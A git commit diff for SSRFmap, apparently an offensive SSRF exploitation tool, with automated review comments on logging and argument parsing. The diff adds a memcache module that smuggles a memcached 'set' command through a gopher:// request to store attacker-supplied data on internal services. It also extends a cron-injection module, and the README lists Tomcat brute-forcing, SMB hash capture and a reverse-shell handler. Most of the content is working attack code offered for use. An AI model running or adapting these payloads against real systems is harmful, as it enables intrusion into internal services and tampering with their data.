MODULE - Memcache store data
parent
d57cbcce98
commit
da86cab442
38
README.md
38
README.md
|
@ -39,6 +39,7 @@ The following modules are already implemented and can be used with the `-m` argu
|
||||||
| `smbhash` | Force an SMB authentication via a UNC Path |
|
| `smbhash` | Force an SMB authentication via a UNC Path |
|
||||||
| `tomcat` | Bruteforce attack against Tomcat Manager |
|
| `tomcat` | Bruteforce attack against Tomcat Manager |
|
||||||
| `custom` | Send custom data to a listening service, e.g: netcat |
|
| `custom` | Send custom data to a listening service, e.g: netcat |
|
||||||
|
| `memcache` | Store data inside the memcache instance |
|
||||||
|
|
||||||
|
|
||||||
## Install and Manual
|
## Install and Manual
|
||||||
|
@ -46,26 +47,27 @@ The following modules are already implemented and can be used with the `-m` argu
|
||||||
Basic install from the Github repository.
|
Basic install from the Github repository.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
git clone https://github.com/swisskyrepo/SSRFmap
|
$ git clone https://github.com/swisskyrepo/SSRFmap
|
||||||
cd SSRFmap/
|
$ cd SSRFmap/
|
||||||
pip3 install -r requirements.txt
|
$ pip3 install -r requirements.txt
|
||||||
python3 ssrfmap.py
|
$ python3 ssrfmap.py
|
||||||
|
|
||||||
usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
|
usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
|
||||||
[--lhost LHOST] [--lport LPORT] [--uagent USERAGENT]
|
[-v [VERBOSE]] [--lhost LHOST] [--lport LPORT]
|
||||||
[--ssl [SSL]] [--level [LEVEL]]
|
[--uagent USERAGENT] [--ssl [SSL]] [--level [LEVEL]]
|
||||||
|
|
||||||
optional arguments:
|
optional arguments:
|
||||||
-h, --help show this help message and exit
|
-h, --help show this help message and exit
|
||||||
-r REQFILE SSRF Request file
|
-r REQFILE SSRF Request file
|
||||||
-p PARAM SSRF Parameter to target
|
-p PARAM SSRF Parameter to target
|
||||||
-m MODULES SSRF Modules to enable
|
-m MODULES SSRF Modules to enable
|
||||||
-l HANDLER Start an handler for a reverse shell
|
-l HANDLER Start an handler for a reverse shell
|
||||||
--lhost LHOST LHOST reverse shell
|
-v [VERBOSE] Enable verbosity
|
||||||
--lport LPORT LPORT reverse shell
|
--lhost LHOST LHOST reverse shell
|
||||||
--uagent USERAGENT User Agent to use
|
--lport LPORT LPORT reverse shell
|
||||||
--ssl [SSL] Use HTTPS without verification
|
--uagent USERAGENT User Agent to use
|
||||||
--level [LEVEL] Level of test to perform (1-5, default: 1)
|
--ssl [SSL] Use HTTPS without verification
|
||||||
|
--level [LEVEL] Level of test to perform (1-5, default: 1)
|
||||||
```
|
```
|
||||||
|
|
||||||
## Examples
|
## Examples
|
||||||
|
|
|
@ -14,10 +14,17 @@ class exploit():
|
||||||
|
|
||||||
def __init__(self, requester, args):
|
def __init__(self, requester, args):
|
||||||
logging.info("Module '{}' launched !".format(name))
|
logging.info("Module '{}' launched !".format(name))
|
||||||
gen_host = gen_ip_list("127.0.0.1", args.level)
|
gen_hosts = gen_ip_list("127.0.0.1", args.level)
|
||||||
SERVICE_PORT = input("Service Port: ")
|
self.SERVICE_PORT = input("Service Port: ")
|
||||||
SERVICE_DATA = "%0d%0a"+urllib.parse.quote(input("Service Data: "))
|
self.SERVICE_DATA = "%0d%0a"+urllib.parse.quote(input("Service Data: "))
|
||||||
|
|
||||||
for SERVICE_IP in gen_host:
|
for gen_host in gen_hosts:
|
||||||
payload = wrapper_gopher(SERVICE_DATA, SERVICE_IP, SERVICE_PORT)
|
payload = wrapper_gopher(self.SERVICE_DATA, gen_host, self.SERVICE_PORT)
|
||||||
r = requester.do_request(args.param, payload)
|
|
||||||
|
if args.verbose == True:
|
||||||
|
logging.info("Generated payload : {}".format(payload))
|
||||||
|
|
||||||
|
r = requester.do_request(args.param, payload)
|
||||||
|
|
||||||
|
if args.verbose == True:
|
||||||
|
logging.info("Module '{}' ended !".format(name))
|
|
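Review bot: The closing `Module '{}' ended !` message now sits under `if args.verbose == True:`, while the matching `launched` message at the top of `__init__` is logged unconditionally, so a default run records a start with no end. Indentation is lost on this page, so that reading is inferred from line order. I would log the end message unconditionally and write the remaining guard as `if args.verbose:`, since `== True` is false for any other truthy value the `-v` option can store. The same two patterns recur in the memcache and redis hunks of this commit. The class enclosing `__init__` starts outside the hunk.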
@ -0,0 +1,34 @@
|
||||||
|
from core.utils import *
|
||||||
|
import urllib.parse
|
||||||
|
import logging
|
||||||
|
|
||||||
|
name = "memcache"
|
||||||
|
description = "Store data inside the memcache instance"
|
||||||
|
author = "Swissky"
|
||||||
|
documentation = []
|
||||||
|
|
||||||
|
class exploit():
|
||||||
|
SERVICE_IP = "127.0.0.1"
|
||||||
|
SERVICE_PORT = "11211"
|
||||||
|
SERVICE_DATA = "\r\n"
|
||||||
|
|
||||||
|
def __init__(self, requester, args):
|
||||||
|
logging.info("Module '{}' launched !".format(name))
|
||||||
|
gen_host = gen_ip_list("127.0.0.1", args.level)
|
||||||
|
payload = input("Data to store: ")
|
||||||
|
|
||||||
|
self.SERVICE_DATA += 'set payloadname 0 0 {}\r\n'.format(len(payload))
|
||||||
|
self.SERVICE_DATA += '{}\r\n'.format(payload)
|
||||||
|
self.SERVICE_DATA += 'quit\r\n'
|
||||||
|
self.SERVICE_DATA = urllib.parse.quote(self.SERVICE_DATA)
|
||||||
|
|
||||||
|
for SERVICE_IP in gen_host:
|
||||||
|
payload = wrapper_gopher(self.SERVICE_DATA, self.SERVICE_IP, self.SERVICE_PORT)
|
||||||
|
|
||||||
|
if args.verbose == True:
|
||||||
|
logging.info("Generated payload : {}".format(payload))
|
||||||
|
|
||||||
|
r = requester.do_request(args.param, payload)
|
||||||
|
|
||||||
|
if args.verbose == True:
|
||||||
|
logging.info("Module '{}' ended !".format(name))
|
|
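Review bot: The new module ships without a docstring and with `documentation = []`, so nothing states what it writes on the service it reaches. From the visible lines it builds a memcached `set payloadname 0 0 <len>` command: a fixed key with flags 0 and expiry 0, which memcached treats as never expiring. A class docstring such as `"""Store operator-supplied data under the fixed key 'payloadname' (flags 0, no expiry) through a gopher:// request."""` would record that for whoever has to find and remove the entry after a test. Separately, `payload` first holds the `input()` string and is then rebound to the gopher URL inside the loop; a distinct name such as `data` for the input would keep the two apart.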
@ -45,9 +45,15 @@ class exploit():
|
||||||
payload = payload.replace("SERVER_CRON", self.SERVER_CRON)
|
payload = payload.replace("SERVER_CRON", self.SERVER_CRON)
|
||||||
payload = payload.replace("LENGTH_PAYLOAD", str(self.LENGTH_PAYLOAD))
|
payload = payload.replace("LENGTH_PAYLOAD", str(self.LENGTH_PAYLOAD))
|
||||||
|
|
||||||
|
if args.verbose == True:
|
||||||
|
logging.info("Generated payload : {}".format(payload))
|
||||||
|
|
||||||
# Send the payload
|
# Send the payload
|
||||||
r = requester.do_request(args.param, payload)
|
r = requester.do_request(args.param, payload)
|
||||||
|
|
||||||
|
if args.verbose == True:
|
||||||
|
logging.info("Module '{}' ended !".format(name))
|
||||||
|
|
||||||
"""
|
"""
|
||||||
TODO:
|
TODO:
|
||||||
This exploit only works if you have control over a cron file.
|
This exploit only works if you have control over a cron file.
|
||||||
|
|
|
@ -29,6 +29,7 @@ def parse_args():
|
||||||
parser.add_argument('-p', action ='store', dest='param', help="SSRF Parameter to target")
|
parser.add_argument('-p', action ='store', dest='param', help="SSRF Parameter to target")
|
||||||
parser.add_argument('-m', action ='store', dest='modules', help="SSRF Modules to enable")
|
parser.add_argument('-m', action ='store', dest='modules', help="SSRF Modules to enable")
|
||||||
parser.add_argument('-l', action ='store', dest='handler', help="Start an handler for a reverse shell")
|
parser.add_argument('-l', action ='store', dest='handler', help="Start an handler for a reverse shell")
|
||||||
|
parser.add_argument('-v', action ='store', dest='verbose', help="Enable verbosity", nargs='?', const=True)
|
||||||
parser.add_argument('--lhost', action ='store', dest='lhost', help="LHOST reverse shell")
|
parser.add_argument('--lhost', action ='store', dest='lhost', help="LHOST reverse shell")
|
||||||
parser.add_argument('--lport', action ='store', dest='lport', help="LPORT reverse shell")
|
parser.add_argument('--lport', action ='store', dest='lport', help="LPORT reverse shell")
|
||||||
parser.add_argument('--uagent',action ='store', dest='useragent', help="User Agent to use")
|
parser.add_argument('--uagent',action ='store', dest='useragent', help="User Agent to use")
|
||||||
|
|
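Review bot: `-v` is declared with `action ='store'`, `nargs='?'` and `const=True`, so it accepts an optional value and stores it as a string, while the modules in this commit test `args.verbose == True`. As a result `-v 1` or `-v true` leaves verbosity off, and only a bare `-v` enables it. A plain flag expresses the intent: `parser.add_argument('-v', action='store_true', dest='verbose', help="Enable verbosity")`, with the README usage line updated from `[-v [VERBOSE]]` to `[-v]`. `parse_args` starts and ends outside the hunk.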